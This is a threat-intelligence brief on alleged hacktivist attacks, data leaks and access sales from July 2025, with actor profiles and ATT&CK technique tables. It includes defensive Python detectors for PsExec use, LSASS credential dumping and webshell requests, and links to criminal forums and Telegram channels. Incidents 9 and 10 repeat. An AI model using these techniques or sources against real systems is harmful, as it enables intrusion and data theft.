Executive Summary
The past 24 hours have underscored a dynamic and multifaceted global cybersecurity landscape, characterized by a spectrum of threats ranging from financially motivated data breaches and malware sales to ideologically driven hacktivism and website defacements. A notable trend involves the direct manifestation of geopolitical conflicts within the cyber domain, where state-aligned actors and their proxies engage in digital warfare to achieve strategic objectives. This includes groups like Akatsuki Cyber Team and Handala, deeply embedded in the Israel-Iran and Israel-Palestine conflicts, respectively, showcasing how real-world tensions translate into targeted cyber operations.
Another significant observation is the dual nature of hacktivism. While some groups, such as KAL EGY 319, primarily engage in symbolic disruptions with minimal actual impact, others like Handala demonstrate an alarming evolution towards nation-state-level capabilities, executing highly destructive and data-intensive attacks. This distinction highlights the critical need for nuanced threat assessment, differentiating between propaganda-driven claims and genuinely impactful breaches. Furthermore, the persistent exploitation of unpatched vulnerabilities by financially motivated actors like Ghost (Cring) Ransomware continues to be a prevalent and effective attack vector, emphasizing fundamental weaknesses in organizational security posture. The reliance on legitimate tools by groups like Rare Werewolf also presents a challenge, as traditional defenses may struggle to differentiate between benign and malicious activity. Collectively, these incidents paint a picture of an increasingly complex threat environment demanding adaptive and intelligence-driven defensive strategies.
Daily Incident Briefs
This section provides a detailed analysis of cybersecurity incidents reported in the last 24 hours. For each incident, a summary of the breach, a comprehensive profile of the responsible threat actor, their observed Tactics, Techniques, and Procedures (TTPs), and the broader impact and context are provided. All available links, including published URLs and screenshots, are included for further reference.
Daily Incident Summary Table
Incident Name | Affected Sector/Entity | Primary Threat Actor | Brief Impact | Date Reported |
AKATSUKI CYBER TEAM claims to target Israel | Israel | Akatsuki cyber team (official) | Alert: Group claims targeting Israel | 2025-07-06T13:23:44Z |
Alleged sale of VPN access to multiple Southeast Asian Academic and Medical Institutions | Academic Institutions across Southeast Asia | XManX | Initial Access: Sale of 7 Fortinet SSL VPN accesses | 2025-07-06T12:03:09Z |
Alleged sale of data from multiple companies | Multiple companies | nick_diesel | Data Leak: Sale of data from multiple companies | 2025-07-06T09:51:31Z |
Alleged data leak of Freedom Wood Doors Ltd | Freedom Wood Doors Ltd, Israel (Manufacturing) | Handala Hack | Data Leak: 92GB data leak including client lists, invoices, schematics | 2025-07-06T09:42:26Z |
KAL EGY 319 claims to target the Turkish government | Turkey (Government Administration) | KAL EGY 319 | Alert: Group claims targeting Turkish government | 2025-07-06T08:20:01Z |
Alleged leak of webshell access to Kerala State Coir Corporation Ltd | Kerala State Coir Corporation Ltd, India (Manufacturing) | WOLF CYBER ARMY | Initial Access: Unauthorized access to corporate systems | 2025-07-06T07:05:48Z |
WOLF CYBER ARMY targets the website of mtsmaarif03.com | mtsmaarif03.com | WOLF CYBER ARMY | Defacement: Website defacement | 2025-07-06T06:11:07Z |
Liwaa Muhammad targets the website of Tamam Company | Tamam Company, Saudi Arabia (Facilities Services) | Liwaa Muhammad | Defacement: Website defacement | 2025-07-06T05:33:37Z |
Alleged data breach of Advanced Call Center Technologies, LLC | Advanced Call Center Technologies, LLC, USA (Outsourcing & Offshoring) | DigitalGhost | Data Breach: Leak of sensitive user information | 2025-07-06T04:24:35Z |
Alleged data breach of Advanced Call Center Technologies, LLC | Advanced Call Center Technologies, LLC, USA (Government & Public Sector) | DigitalGhost | Data Breach: Leak of sensitive user information | 2025-07-06T04:18:11Z |
Alleged data breach of Go Bus | Go Bus, Egypt (Transportation & Logistics) | stepbro | Data Breach: 1.4 million customer records leaked | 2025-07-06T04:10:18Z |
Alleged Data Leak of Taxi Company Egypt | Egypt (Transportation & Logistics) | stepbro | Data Leak: 176,000 user records leaked | 2025-07-06T04:07:56Z |
Alleged data breach of Mazaya Egypt | Mazaya Egypt, Egypt (Retail Industry) | stepbro | Data Breach: Breach of customer data (name, address, payment) | 2025-07-06T04:01:05Z |
Liwaa Muhammad targets the website of Arkan Al Omran Factory | Arkan Al Omran Factory, Saudi Arabia (Manufacturing) | Liwaa Muhammad | Defacement: Website defacement | 2025-07-06T03:37:17Z |
Liwaa Muhammad targets the website of Multi Technical Solutions Establishment | Multi Technical Solutions Establishment, Saudi Arabia (Sports) | Liwaa Muhammad | Defacement: Website defacement | 2025-07-06T03:37:12Z |
Alleged data leak of Philippine fresh user records | Philippines | NotFoundddd | Data Leak: Over 500,000 user records leaked | 2025-07-06T02:51:59Z |
Alleged data breach of SOM ENERGIA | Som Energia, Spain (Renewables & Environment) | Nosferatu | Data Breach: 120,000 records leaked (personal, banking) | 2025-07-06T02:42:27Z |
Alleged leak of Vehicle Plates Database Chile | Chile | DelitosPenales | Data Leak: Over 55,000 vehicle registration records leaked | 2025-07-06T02:41:48Z |
Alleged sale of CAIN Malware | N/A | BUBBAS GATE | Malware: Sale of malicious cryptocurrency wallet clone | 2025-07-06T02:16:23Z |
Alleged data sale of documents from a Federal State Budgetary Institution of Higher Education | Russia (Higher Education/Academia) | deabec | Data Leak: Sale of classified documents (Gazprom, tax, legal) | 2025-07-06T01:45:35Z |
Alleged data breach of Fashion Group México and GOC Makeup | Fashion Group México, Mexico (Healthcare & Pharmaceuticals) | Rui_Deidad | Data Breach: 135,535 records leaked (personal, financial) | 2025-07-06T00:43:03Z |
Alleged leak of data from a Seychelles main bank | Seychelles (Banking & Mortgage) | ByteToBreach | Data Leak: Client information leaked from major bank | 2025-07-06T00:30:25Z |
Alleged data sale from an unidentified financial services firm in Panama | Panama (Financial Services) | Lucczi | Data Leak: 60,000 financial service entries leaked | 2025-07-06T00:01:23Z |
Incident 1: AKATSUKI CYBER TEAM claims to target Israel
Summary of Breach and Affected Entities:
A recent post by the group claims that they are targeting Israel.
Detailed Threat Actor Profile: Akatsuki Cyber Team
Identity and Affiliation: Akatsuki Cyber Team is recognized as a pro-Iran hacktivist group. This group is increasingly prominent within the ongoing Israel-Iran cyber conflict, particularly as many Iran-based groups may experience reduced activity due to internet blackouts. Akatsuki Cyber Team is observed to be coordinating efforts and directing its focus towards Israeli targets.1 Their operations are part of a broader “cyber war” that involves both official Iranian cyber units and various proxy groups.1
Motivations: The primary drivers behind Akatsuki Cyber Team’s operations are geopolitical and ideological, aligning directly with Iran’s strategic interests within the cyber domain. Their activities are designed to contribute to shaping public perception and exerting pressure during periods of geopolitical escalation.1
Tactics, Techniques, and Procedures (TTPs):
Tactic | Technique | Description/Examples | Associated Malware/Tools | MITRE ATT&CK ID |
Initial Access | Exploit Public-Facing Application | Exploitation of unpatched or outdated software with known Common Vulnerabilities and Exposures (CVEs).2 | N/A | T1190 |
Initial Access | Valid Accounts | Exploitation of default or common passwords on internet-connected accounts and devices; automated password guessing; password hash cracking.2 | N/A | T1078 |
Reconnaissance | Active Scanning | Utilization of tools like Shodan to identify vulnerable internet-facing devices, particularly within Industrial Control System (ICS) environments.2 | Shodan | T1595.002 |
Lateral Movement | Internal Spearphishing | Exploiting weak segmentation or misconfigured firewalls to move across networks after initial compromise.2 | N/A | T1534 |
Execution & Persistence | Remote Access Tools (RATs) | Deployment of RATs for remote control and access.2 | Various RATs | T1219 |
Execution & Persistence | Credential Dumping | Use of keyloggers and legitimate administrative utilities to escalate access and evade endpoint defenses.2 | Keyloggers, Mimikatz | T1003 |
Execution & Persistence | Command and Scripting Interpreter | Use of legitimate administrative utilities like PsExec.2 | PsExec | T1059 |
Impact | Data Destruction | Potential future use of wiper malware to destroy data.1 | Wiper malware | T1485 |
Impact | Data Encrypted for Impact | Potential future use of ransomware for financial support.1 | Ransomware | T1486 |
Impact | Denial of Service | Execution of Distributed Denial of Service (DDoS) attacks.1 | N/A | T1498 |
Impact | Data Theft | Campaigns focused on stealing data.1 | N/A | T1041 |
Impact | Disruptive Attacks | Intrusion attempts on critical infrastructure, potential exploitation of PLCs, SCADAs, and other OT systems.1 | N/A | T1499, T1529 |
Command and Control | Ingress Tool Transfer | Employing system engineering and diagnostic tools to breach Operational Technology (OT) networks.2 | N/A | T1105 |
Collection | Data from Local System | Siphoning credentials and other sensitive information.2 | N/A | T1005 |
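As an added defensive example (not from this brief or any of its cited sources), the following Python flags two host-side behaviours listed in the table above, PsExec service installation and memory-read access to LSASS as performed by credential-dumping tools such as Mimikatz, in constructed Windows event records. The record layout, the sample values and the allowlist of legitimate LSASS readers are assumptions to be tuned per environment.

```python
"""Added example: triage constructed Windows event records for PsExec use and LSASS credential
dumping. Field names are a simplified JSON-like shape (assumption), but the event semantics follow
the documented System event 7045 (service installed) and Sysmon event 10 (process access)."""
import re

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws-01", "channel": "System", "event_id": 7045,
     "service_name": "PSEXESVC", "image_path": r"C:\Windows\PSEXESVC.exe"},
    {"host": "ws-01", "channel": "Sysmon", "event_id": 10,
     "source_image": r"C:\Users\a\AppData\Local\Temp\mk.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"host": "ws-02", "channel": "Sysmon", "event_id": 10,
     "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1400"},
    {"host": "ws-03", "channel": "System", "event_id": 7045,
     "service_name": "Backup Agent", "image_path": r"C:\Program Files\Backup\agent.exe"},
]

# PsExec's default service is PSEXESVC; the name can be changed, so the binary path is checked too.
PSEXEC_SERVICE_RE = re.compile(r"psexesvc", re.IGNORECASE)

# Process access rights that allow reading or writing LSASS memory:
# PROCESS_VM_OPERATION (0x0008), PROCESS_VM_READ (0x0010), PROCESS_VM_WRITE (0x0020).
# Query-only rights such as 0x0400 / 0x1000 are not enough to dump credentials.
LSASS_DUMP_MASK = 0x0008 | 0x0010 | 0x0020

# Processes that legitimately open LSASS with memory rights; starting point only (assumption).
LSASS_READERS_ALLOWED = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}


def is_psexec_service_install(ev):
    """System 7045: a new service whose name or binary points at PSEXESVC."""
    if ev.get("channel") != "System" or ev.get("event_id") != 7045:
        return False
    return bool(PSEXEC_SERVICE_RE.search(ev.get("service_name", ""))
                or PSEXEC_SERVICE_RE.search(ev.get("image_path", "")))


def is_suspicious_lsass_access(ev):
    """Sysmon 10: a non-allowlisted process opening lsass.exe with memory-read/write rights."""
    if ev.get("channel") != "Sysmon" or ev.get("event_id") != 10:
        return False
    if not ev.get("target_image", "").lower().endswith(r"\lsass.exe"):
        return False
    try:
        granted = int(ev.get("granted_access", "0"), 16)
    except ValueError:
        return False
    if not granted & LSASS_DUMP_MASK:
        return False
    return ev.get("source_image", "").lower() not in LSASS_READERS_ALLOWED


def triage(events):
    """Return (host, finding) pairs in input order, at most one finding per event."""
    findings = []
    for ev in events:
        if is_psexec_service_install(ev):
            findings.append((ev["host"], "psexec_service_install"))
        elif is_suspicious_lsass_access(ev):
            findings.append((ev["host"], "lsass_memory_read"))
    return findings


if __name__ == "__main__":
    for host, finding in triage(SAMPLE_EVENTS):
        print(f"{host}: {finding}")
```

Both checks are noisy on their own (administrators do use PsExec; security products do read LSASS), so in practice they are correlated with the originating user and process rather than alerted on directly.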
Impact and Broader Context:
The activities of Akatsuki Cyber Team are a direct reflection of the “cyber reflections” of the Israel-Iran conflict, indicating a likelihood of faster and more intense digital confrontations.1 Their visible and early involvement in these escalations suggests that state-linked cyber units are increasingly instrumental in shaping both public perception and strategic pressure, blurring the traditional boundaries between conventional and cyber warfare.1 The consistent pattern of state-sponsored entities and their aligned hacktivist proxies engaging in cyber actions demonstrates a direct and escalating manifestation of real-world geopolitical conflicts within the cyber domain. This means that organizations with ties to regions experiencing geopolitical tensions must maintain heightened vigilance against ideologically motivated attacks, which may prioritize disruption, psychological warfare, or intelligence gathering over purely financial objectives.
Relevant Resources:
Published URL: https://t.me/c/2601166559/102
Screenshots: https://d34iuop8pidsy8.cloudfront.net/d479d4c2-89e9-48ab-aa6b-d1dd8e00996f.PNG, https://d34iuop8pidsy8.cloudfront.net/25e692d9-0ea5-4c48-bcd2-0abd4c4ac604.PNG
Incident 2: Alleged sale of VPN access to multiple Southeast Asian Academic and Medical Institutions
Summary of Breach and Affected Entities:
The threat actor claims to be selling unauthorized access to 7 Fortinet SSL VPNs allegedly linked to legitimate .edu and .ac domain networks. The compromised VPN credentials reportedly grant access to internal systems of university and academic institutions across Southeast Asia, including Malaysia, Thailand, Taiwan, Kenya, Pakistan, and India.
Detailed Threat Actor Profile: XManX
Identity and Affiliation: XManX is identified as a threat actor operating in online criminal forums, potentially involved in the sale of access to compromised systems.3 Specific details regarding their history or broader affiliations are limited in the provided research material.
Motivations: As with many actors on cybercrime forums, the primary motivation for XManX appears to be financial gain through the sale of illicit access.3
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for XManX are not detailed in the provided research. However, general methods for gaining initial access to systems for sale often include exploiting public-facing applications with known vulnerabilities (CVEs) or using default/common passwords.2
Impact and Broader Context:
The sale of VPN access poses a significant risk as it can lead to further exploitation, including data theft, ransomware deployment, or other disruptive activities within the compromised networks. The targeting of academic and medical institutions highlights the vulnerability of these sectors to financially motivated cybercrime.
Relevant Resources:
Published URL: https://darkforums.st/Thread-Selling-7-Fortinet-SSL-VPN-Access-%E2%80%93-edu-ac-Domains
Screenshots: https://d34iuop8pidsy8.cloudfront.net/5e441023-87e8-41b2-b9ee-717b77100da6.png
Incident 3: Alleged sale of data from multiple companies
Summary of Breach and Affected Entities:
The threat actor claims to be selling data from multiple companies.
Detailed Threat Actor Profile: nick_diesel
Identity and Affiliation: nick_diesel is identified as a threat actor active on online forums, potentially involved in the sale of stolen data.5 Specific details regarding their history or broader affiliations are limited in the provided research material.6
Motivations: The primary motivation for nick_diesel appears to be financial gain through the sale of exfiltrated data.
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for nick_diesel are not detailed in the provided research. Data leaks typically result from various methods, including exploiting vulnerabilities, phishing, or insider threats.7
Impact and Broader Context:
The sale of data from multiple companies indicates a broad targeting strategy, potentially impacting various industries and exposing sensitive information. Such data can be used for further cybercrime, including identity theft, fraud, or targeted phishing campaigns.
Relevant Resources:
Published URL: https://forum.exploit.in/topic/261980/?tab=comments#comment-1579683
Screenshots: https://d34iuop8pidsy8.cloudfront.net/5bafa785-f578-4086-8cf5-2b0c36c553ee.png
Incident 4: Alleged data leak of Freedom Wood Doors Ltd
Summary of Breach and Affected Entities:
A threat actor claims to have leaked 92GB of data from Freedom Wood Doors Ltd, Israel. The breach reportedly includes client lists, invoices, delivery schedules, technical schematics, and PoC.
Detailed Threat Actor Profile: Handala Hack Group
Identity and Affiliation: Handala is a pro-Palestinian hacktivist group that has demonstrated significant activity targeting Israeli organizations and digital infrastructure since late 2023.8 While the group asserts independent activism, many cybersecurity experts suggest that Iranian state interests may play a supporting role, indicating a potential proxy relationship.8
Motivations: The group is ideologically driven by pro-Palestinian motives, focusing its attacks on Israeli government, infrastructure, and private organizations.8 Handala’s operational strategy integrates technical capabilities with psychological warfare, leveraging mass communications to amplify fear and confusion among victims and the broader public.8
Tactics, Techniques, and Procedures (TTPs):
Tactic | Technique | Description/Examples | Associated Malware/Tools | MITRE ATT&CK ID |
Initial Access | Phishing | Phishing campaigns, often exploiting major events and critical vulnerabilities, masquerading as legitimate organizations to gain initial access. Evolution from basic phishing to credential-based infiltrations.9 | N/A | T1566 |
Execution & Persistence | Multi-Stage Loading | Utilization of a multi-stage loading process for malware delivery, including a Delphi-coded second-stage loader and an AutoIT injector.9 | Delphi, AutoIT injector | T1059 |
Execution & Persistence | Privilege Escalation | Focus on privilege escalation and establishing long-term persistence within victim environments.8 | N/A | T1068 |
Defense Evasion | Obfuscated Files or Information | Malware designed to blend into normal network traffic to evade detection.8 | N/A | T1027 |
Impact | Data Destruction | Use of custom wiper malware specifically targeting Windows and Linux environments for destructive attacks.9 | win.handala, win.hatef, win.flash_develop | T1485 |
Impact | Data Theft | Engagement in data theft and extortion.9 | N/A | T1041 |
Impact | Denial of Service | Execution of Distributed Denial of Service (DDoS) attacks.8 | N/A | T1498 |
Exfiltration | Exfiltration Over C2 Channel | Use of cloud storage (e.g., AWS S3, Storj) and multi-channel Command and Control (C2) techniques, including Telegram, for data exfiltration.8 | AWS S3, Storj, Telegram, senvarservice-DC.exe | T1041, T1567.002 |
Impact | Public Disclosure | Operation of a data leak site to publicize stolen data, although claims of success are sometimes disputed.9 | Data leak site | T1598 |
Impact | Psychological Operations | Triggering emergency sirens and sending mass SMS alerts to cause panic (e.g., kindergarten alert hijack).8 | N/A | T1589 |
Communication | Social Media | Heavy use of Telegram and social media to publicize operations and taunt victims.8 | Telegram, social media | T1589 |
Impact and Broader Context:
Handala’s evolution from a disruptive hacktivist collective to an actor demonstrating “nation-state-level capabilities” highlights the increasing sophistication of ideologically motivated groups, especially when they receive potential backing from state interests.8 The documented disruption of their activities through proactive threat intelligence, exemplified by OP Innovate’s “Unpacking Handala” report, underscores the critical importance of detailed technical analysis in empowering defenders and disrupting threat actor momentum.8 This demonstrates that comprehensive intelligence gathering and dissemination can significantly enhance overall cyber resilience by providing organizations with early-warning capabilities and actionable Indicators of Compromise (IOCs).8
Relevant Resources:
Published URL: https://t.me/handala_hack27/81
Screenshots: https://d34iuop8pidsy8.cloudfront.net/493cff5b-f38d-49af-a286-8622d8616d96.png
Incident 5: KAL EGY 319 claims to target the Turkish government
Summary of Breach and Affected Entities:
A recent post by the group claims that they are targeting the Turkish government.
Detailed Threat Actor Profile: KAL EGY 319
Identity and Affiliation: KAL EGY 319 is identified as a Pakistan-linked hacktivist group. This group operates within a broader surge of hacktivist activity related to the India-Pakistan conflict, often alongside other groups such as Nation Of Saviors and SYLHET GANG-SG.10
Motivations: The group is ideologically driven by the India-Pakistan conflict, claiming responsibility for attacks on Indian government, educational institutions, and critical infrastructure websites.10
Tactics, Techniques, and Procedures (TTPs):
Tactic | Technique | Description/Examples | Claimed Impact | Actual Verified Impact |
Initial Access | Phishing | Phishing emails with malicious attachments, such as PowerPoint files containing macros.10 | N/A | N/A |
Execution | Malicious File | Delivery of Crimson RAT malware cleverly disguised as an image file (e.g., WEISTT.jpg), which then launches an executable (jnmxrvt hcsm.exe) to initiate infection.10 | N/A | N/A |
Impact | Defacement | Claimed widespread defacement campaign affecting approximately 40 Indian educational and medical websites.10 | Approximately 40 Indian educational and medical websites defaced.10 | All named websites were found to be functioning normally; defacements were either not fully executed or did not result in significant compromise.10 |
Impact | Data Breach | Claims of over 100 successful breaches of government sites and critical infrastructure, including the CBI, Election Commission of India (ECI), and National Portal of India. Alleged exfiltration of 247 GB of sensitive government data from India’s National Informatics Centre.10 | Over 100 breaches, 247 GB of sensitive government data exfiltrated.10 | Alleged data leaks were largely unsubstantiated, consisting of publicly available marketing materials or recycled data. The “proof” for the 247 GB claim amounted to just 1.5 GB of public media files.10 |
Impact | Data Breach | Alleged data stolen from the Andhra Pradesh High Court.11 | Data stolen from Andhra Pradesh High Court.11 | Consisted mostly of case metadata already available online.11 |
Impact and Broader Context:
The activities of KAL EGY 319 exemplify the “tactical reality behind the India-Pakistan hacktivist surge,” where claimed disruptions are often symbolic rather than deeply impactful.10 This highlights a common characteristic of some hacktivist operations: high visibility and bold claims that serve as propaganda, but with limited technical sophistication or lasting damage. This contrasts sharply with more advanced state-sponsored groups, such as APT36, which has been observed using sophisticated phishing campaigns to infiltrate Indian government and defense networks.11 Understanding this distinction is crucial for accurate threat assessment, preventing the misallocation of resources to symbolic attacks, and ensuring focus remains on threats with verified, tangible impact.
Relevant Resources:
Published URL: https://t.me/c/2678006578/8
Screenshots: https://d34iuop8pidsy8.cloudfront.net/65969aa7-698f-4266-91ec-d9efe48773fd.png
Incident 6: Alleged leak of webshell access to Kerala State Coir Corporation Ltd
Summary of Breach and Affected Entities:
The group claims to have gained unauthorized access to the Kerala State Coir Corporation Ltd.
Detailed Threat Actor Profile: WOLF CYBER ARMY
Identity and Affiliation: WOLF CYBER ARMY is identified as a threat actor group. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.12 Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.7
Motivations: While specific motivations for WOLF CYBER ARMY are not detailed, threat actors can be driven by various factors including financial gain, ideological beliefs (hacktivism), or state-sponsored objectives.7
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for WOLF CYBER ARMY are not detailed in the provided research. However, initial access, such as gaining webshell access, often involves exploiting public-facing applications, phishing, or leveraging compromised credentials.2
Impact and Broader Context:
Unauthorized access, such as webshell access, is a critical initial step for attackers, allowing them to maintain persistence, escalate privileges, and potentially exfiltrate data or deploy further malicious payloads. This incident highlights the importance of securing web applications and monitoring for unauthorized access attempts.
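As an added defensive example (not from this brief), the following Python scores constructed web-server access-log lines for the request pattern a freshly planted webshell tends to produce: a script file being served from a directory meant for static uploads, driven by POST requests without a referer from a non-browser client. The log lines, the upload-directory list and the alert threshold are assumptions.

```python
"""Added example: group constructed combined-format access-log lines by (client IP, path) and
report pairs that trip several webshell indicators. Paths and thresholds are assumptions."""
import re
from collections import defaultdict

# Constructed sample lines (Apache/Nginx combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Jul/2025:06:40:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "https://example.test/" "Mozilla/5.0"
203.0.113.5 - - [06/Jul/2025:06:41:10 +0000] "POST /uploads/images/cache.php HTTP/1.1" 200 312 "-" "python-requests/2.31"
203.0.113.5 - - [06/Jul/2025:06:41:12 +0000] "POST /uploads/images/cache.php HTTP/1.1" 200 1840 "-" "python-requests/2.31"
203.0.113.5 - - [06/Jul/2025:06:41:15 +0000] "POST /uploads/images/cache.php HTTP/1.1" 200 77 "-" "python-requests/2.31"
198.51.100.7 - - [06/Jul/2025:06:42:00 +0000] "GET /products.php?id=3 HTTP/1.1" 200 9001 "https://example.test/" "Mozilla/5.0"
198.51.100.7 - - [06/Jul/2025:06:42:30 +0000] "POST /contact.php HTTP/1.1" 302 0 "https://example.test/contact.php" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Directories that should only ever serve static content (assumption; tune per site).
UPLOAD_DIRS = ("/uploads/", "/media/", "/files/")
SCRIPT_EXT = (".php", ".jsp", ".aspx", ".asp")


def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def webshell_indicators(rec):
    """Return the indicators a single request trips (empty list means nothing unusual)."""
    ind = []
    path = rec["path"].split("?", 1)[0].lower()
    if path.startswith(UPLOAD_DIRS) and path.endswith(SCRIPT_EXT):
        ind.append("script_in_upload_dir")   # executable file where only static content belongs
    if rec["method"] == "POST" and rec["referer"] == "-" and path.endswith(SCRIPT_EXT):
        ind.append("post_without_referer")   # driven by a tool, not by a browser form submission
    if not rec["ua"].startswith("Mozilla/"):
        ind.append("non_browser_user_agent")
    return ind


def triage(log_text, min_hits=2):
    """Report (ip, path, indicators) for pairs that tripped at least min_hits distinct indicators."""
    buckets = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0].lower()
        buckets[(rec["ip"], path)].update(webshell_indicators(rec))
    return sorted((ip, path, sorted(inds))
                  for (ip, path), inds in buckets.items() if len(inds) >= min_hits)


if __name__ == "__main__":
    for ip, path, inds in triage(SAMPLE_LOG):
        print(f"{ip} {path}: {', '.join(inds)}")
```

A hit is a starting point for checking the file's creation time and owner on disk, not proof of compromise on its own.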
Relevant Resources:
Published URL: https://t.me/c/2678983526/581
Screenshots: https://d34iuop8pidsy8.cloudfront.net/fcecbd86-919f-4274-b75b-6bd211f5ca41.png
Incident 7: WOLF CYBER ARMY targets the website of mtsmaarif03.com
Summary of Breach and Affected Entities:
The group claims to have defaced the website of mtsmaarif03.com. Mirror Link: https://defacer.id/mirror/id/170069
Detailed Threat Actor Profile: WOLF CYBER ARMY
Identity and Affiliation: WOLF CYBER ARMY is identified as a threat actor group. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.12 Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.7
Motivations: While specific motivations for WOLF CYBER ARMY are not detailed, defacement attacks are often carried out by hacktivists seeking to spread a message or demonstrate capabilities.14
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for WOLF CYBER ARMY are not detailed in the provided research. Website defacement typically involves exploiting vulnerabilities in web applications, content management systems, or server configurations to alter the visual appearance of a website.7
Impact and Broader Context:
Website defacement, while often symbolic, can damage an organization’s reputation, disrupt services, and indicate underlying vulnerabilities that could be exploited for more severe attacks.
Relevant Resources:
Published URL: https://t.me/c/2678983526/579
Screenshots: https://d34iuop8pidsy8.cloudfront.net/16545dde-299b-4cc7-8945-e9deb77172f9.jpg
Incident 8: Liwaa Muhammad targets the website of Tamam Company
Summary of Breach and Affected Entities:
The group claims to have defaced the website of Tamam Company.
Detailed Threat Actor Profile: Liwaa Muhammad
Identity and Affiliation: Liwaa Muhammad is identified as a threat actor group. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.15 Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.7
Motivations: While specific motivations for Liwaa Muhammad are not detailed, defacement attacks are often carried out by hacktivists seeking to spread a message or demonstrate capabilities.14
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for Liwaa Muhammad are not detailed in the provided research. Website defacement typically involves exploiting vulnerabilities in web applications, content management systems, or server configurations to alter the visual appearance of a website.7
Impact and Broader Context:
Website defacement, while often symbolic, can damage an organization’s reputation, disrupt services, and indicate underlying vulnerabilities that could be exploited for more severe attacks.
Relevant Resources:
Published URL: https://t.me/liwaamohammad/477
Screenshots: https://d34iuop8pidsy8.cloudfront.net/f346a44b-5e5a-4514-b223-18bf8e3ee252.jpg
Incident 9: Alleged data breach of Advanced Call Center Technologies, LLC
Summary of Breach and Affected Entities:
The threat actor claims to have leaked a database of Advanced Call Center Technologies containing sensitive user information, including user IDs, phone numbers, email addresses, and timestamps of activity.
Detailed Threat Actor Profile: DigitalGhost
Identity and Affiliation: DigitalGhost is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.20 The research notes explicitly state that information about “Ghost (Cring) Ransomware” refers to a different group and not “DigitalGhost”.21 Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.7
Motivations: While specific motivations for DigitalGhost are not detailed, data breaches are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums.7
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for DigitalGhost are not detailed in the provided research. Data breaches often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases.7
Impact and Broader Context:
A data breach involving sensitive user information can lead to significant financial and reputational damage for the victim organization. Compromised data can be used for identity theft, phishing, and other fraudulent activities, impacting a large number of individuals.
Relevant Resources:
Published URL: https://darkforums.st/Thread-68K-ADVANCED-CALL-CANTER-TECHNOLOGIES-DATA
Screenshots: https://d34iuop8pidsy8.cloudfront.net/86ae01ed-8987-4067-9631-24fa423c30a1.png, https://d34iuop8pidsy8.cloudfront.net/512ce153-a65f-499e-ac38-2ea0130086be.png
Incident 10: Alleged data breach of Advanced Call Center Technologies, LLC
Summary of Breach and Affected Entities:
The threat actor claims to have leaked a database of Advanced Call Center Technologies containing sensitive user information, including user IDs, phone numbers, email addresses, and timestamps of activity.
Detailed Threat Actor Profile: DigitalGhost
Identity and Affiliation: DigitalGhost is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.20 The research notes explicitly state that information about “Ghost (Cring) Ransomware” refers to a different group and not “DigitalGhost”.21 Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.7
Motivations: While specific motivations for DigitalGhost are not detailed, data breaches are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums.7
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for DigitalGhost are not detailed in the provided research. Data breaches often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases.7
Impact and Broader Context:
A data breach involving sensitive user information can lead to significant financial and reputational damage for the victim organization. Compromised data can be used for identity theft, phishing, and other fraudulent activities, impacting a large number of individuals.
Relevant Resources:
Published URL: https://darkforums.st/Thread-68K-ADVANCED-CALL-CANTER-TECHNOLOGIES-DATA
Screenshots: https://d34iuop8pidsy8.cloudfront.net/86ae01ed-8987-4067-9631-24fa423c30a1.png, https://d34iuop8pidsy8.cloudfront.net/512ce153-a65f-499e-ac38-2ea0130086be.png
Incident 11: Alleged data breach of Go Bus
Summary of Breach and Affected Entities:
The threat actor claims to have leaked the database of GoBus Egypt, compromising data from 1.4 million customers. The exposed information includes names, email addresses, phone numbers, and password hashes.
Detailed Threat Actor Profile: stepbro
Identity and Affiliation: stepbro is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material.22 Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks.7
Motivations: Data breaches are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums.7
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for stepbro are not detailed in the provided research.24 Data breaches often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases.7
Impact and Broader Context:
A data breach of this scale, affecting 1.4 million customers and including sensitive information like password hashes, poses a severe risk of identity theft, account compromise, and further targeted attacks. This highlights the critical need for strong data security measures and robust password policies.
Relevant Resources:
Published URL: https://xss.is/threads/141331/
